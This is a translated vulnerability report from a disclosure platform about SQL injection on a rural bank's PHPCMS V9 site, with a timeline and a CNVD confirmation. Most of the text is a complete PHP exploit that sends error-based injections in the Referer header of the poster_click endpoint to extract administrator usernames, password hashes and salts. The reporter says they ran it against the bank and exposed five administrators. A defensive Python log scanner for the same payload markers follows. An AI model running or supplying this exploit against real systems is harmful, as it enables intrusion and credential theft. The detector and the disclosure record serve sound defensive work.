2015-09-22: Details reported to the vendor, awaiting vendor handling
2015-09-23: CNCERT (National Internet Emergency Center) could not yet reach the responsible organisation; details disclosed only to the reporting body
2015-10-03: Details disclosed to core white hats and experts in the relevant field
2015-10-13: Details disclosed to ordinary white hats
2015-10-23: Details disclosed to intern white hats
2015-11-07: Details disclosed to the public
SQL injection.
The main site of Hunan Yizhang Rural Commercial Bank has a SQL injection. The cause is that the system runs an old version of phpcms V9..., which gives rise to the PHPCMS V9 poster_click injection. The details of this vulnerability were published on the Internet long ago, so I won't go into them. I ran the EXP written by the experts; the EXP is as follows:
```php
<?php
/**
 * Created by 独自等待
 * User: Hack2012
 * Date: 13-2-4 下午8:25
 * FileName: phpcmsv9_post_v3.php
 * 独自等待博客 **.**.**.**
 */
print_r('+------------------------------------------------------+
PHPCMS_V9 poster_click 注入EXP
Site: http://**.**.**.**/
Exploit BY: 独自等待
Time: 2013-02-19
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('+------------------------------------------------------+
Usage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path of phpcms
Example: php ' . $argv[0] . ' localhost /phpcms
+------------------------------------------------------+
');
    exit;
}
error_reporting(7);
// timing
$start_time = func_time();
$host = $argv[1];
$path = $argv[2];
// first probe: count the administrators (its error message also leaks the table prefix)
$cmd1 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
//echo send_pack($cmd1);
if (preg_match('/MySQL Query/', send_pack($cmd1))) {
    // read the table prefix of the admin table out of the MySQL error message
    preg_match('/\.`(.*?)_poster/', send_pack($cmd1), $prefix_match);
    $tableadmin = $prefix_match[1] . '_admin';
    // number of administrators
    $cmd2 = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM $tableadmin)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
    preg_match('/\'#(\d+)#1/U', send_pack($cmd2), $num_match);
    $count = $num_match[1];
    echo '共有' . $count . '个管理员' . "\n";
    // administrator usernames and password data
    if (preg_match('/Duplicate/', send_pack($cmd2))) {
        foreach (range(0, ($count - 1)) as $i) {
            $payload = "Referer: ' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x3a,encrypt,0x23) FROM $tableadmin Order by userid LIMIT $i,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";
            preg_match('/\'#(.*)#1/U', send_pack($payload), $admin_match);
            if (preg_match('/charset=utf-8/', send_pack($payload))) {
                echo $i . '-->' . iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            } else {
                echo $i . '-->' . $admin_match[1] . "\n";
            }
            //echo $admin_match[1]. "\n";
            //echo iconv('utf-8', 'gbk//IGNORE', $admin_match[1]) . "\n";
            //echo mb_convert_encoding($admin_match[1],'gbk','auto')."\n";
        }
    }
} else {
    exit("报告大人,网站不存在此漏洞,你可以继续秒下一个!\n");
}
// send the raw HTTP request and return the response
function send_pack($cmd)
{
    global $host, $path;
    $data = "GET " . $path . "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1 HTTP/1.1\r\n";
    $data .= "Host: " . $host . "\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= $cmd . "\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Connection: Close\r\n\r\n"; // two \r\n are required here, otherwise the server keeps waiting and returns nothing
    $fp = @fsockopen($host, 80, $errno, $errstr, 30);
    //echo ini_get('default_socket_timeout'); // default timeout is 60 seconds
    if (!$fp) {
        echo $errno . '-->' . $errstr;
        exit('Could not connect to: ' . $host);
    } else {
        fwrite($fp, $data);
        $back = '';
        while (!feof($fp)) {
            $back .= fread($fp, 1024);
        }
        fclose($fp);
    }
    return $back;
}
// timing helper
function func_time()
{
    list($microsec, $sec) = explode(' ', microtime());
    return $microsec + $sec;
}
echo '脚本执行时间:' . round((func_time() - $start_time), 4) . '秒。';
?>
```
The result is as follows: there are 5 administrators in total, and the usernames are exposed just like that...
OK, the issue is proven up to this point.
Deserved!
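For the defending side, an added example that is not part of this report or of the EXP above: it scans web-server access-log lines for requests to the phpcms poster_click action whose Referer header carries the markers of the error-based (duplicate-entry) technique the EXP relies on, i.e. floor(rand(0)*2) with group by and information_schema reads. The combined log format, the client addresses and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Combined-log-format line: client ident user [time] "METHOD PATH PROTO" status size "referer" "ua"
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')

# Markers of the error-based injection technique used against poster_click.
MARKERS = [
    re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    re.compile(r"\bgroup\s+by\b", re.I),
    re.compile(r"information_schema", re.I),
    re.compile(r"\bconcat\s*\(", re.I),
]

def is_poster_click(path: str) -> bool:
    """True when the request targets the phpcms poster_click action."""
    qs = parse_qs(urlparse(path).query)
    return qs.get("m") == ["poster"] and qs.get("a") == ["poster_click"]

def referer_score(referer: str) -> int:
    """Number of injection markers present in a Referer value (0 for a normal URL)."""
    return sum(1 for pat in MARKERS if pat.search(referer))

def analyze(lines, threshold: int = 2):
    """Return (client, hit_poster_click, score) for each request whose Referer looks injected."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        score = referer_score(m["referer"])
        if score >= threshold:
            hits.append((m["client"], is_poster_click(m["path"]), score))
    return hits

# Constructed sample traffic (hypothetical addresses): a normal poster_click hit,
# the report's injected Referer on poster_click, and a normal request to another module.
PAYLOAD = ("' and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,count(*),0x23) FROM v9_admin)) "
           "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1")
POSTER = "/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=1"

def log_line(client, path, referer):
    return f'{client} - - [22/Sep/2015:10:01:02 +0800] "GET {path} HTTP/1.1" 200 512 "{referer}" "Mozilla/5.0"'

SAMPLE_LOG = [
    log_line("203.0.113.5", POSTER, "http://www.example.com/index.php"),
    log_line("203.0.113.5", POSTER, PAYLOAD),
    log_line("198.51.100.7", "/index.php?m=content&c=index&a=lists&catid=6", "http://www.example.com/"),
]
```

Running `analyze(SAMPLE_LOG)` flags only the second line, with all four markers present; a real deployment would read the log stream instead of the constructed list.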
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-23 14:46
CNVD has confirmed and reproduced the described situation; it has been passed to CNCERT to notify the banking-sector IT authority and sent down to the Hunan branch centre, which will coordinate handling with the website's operator.
None for now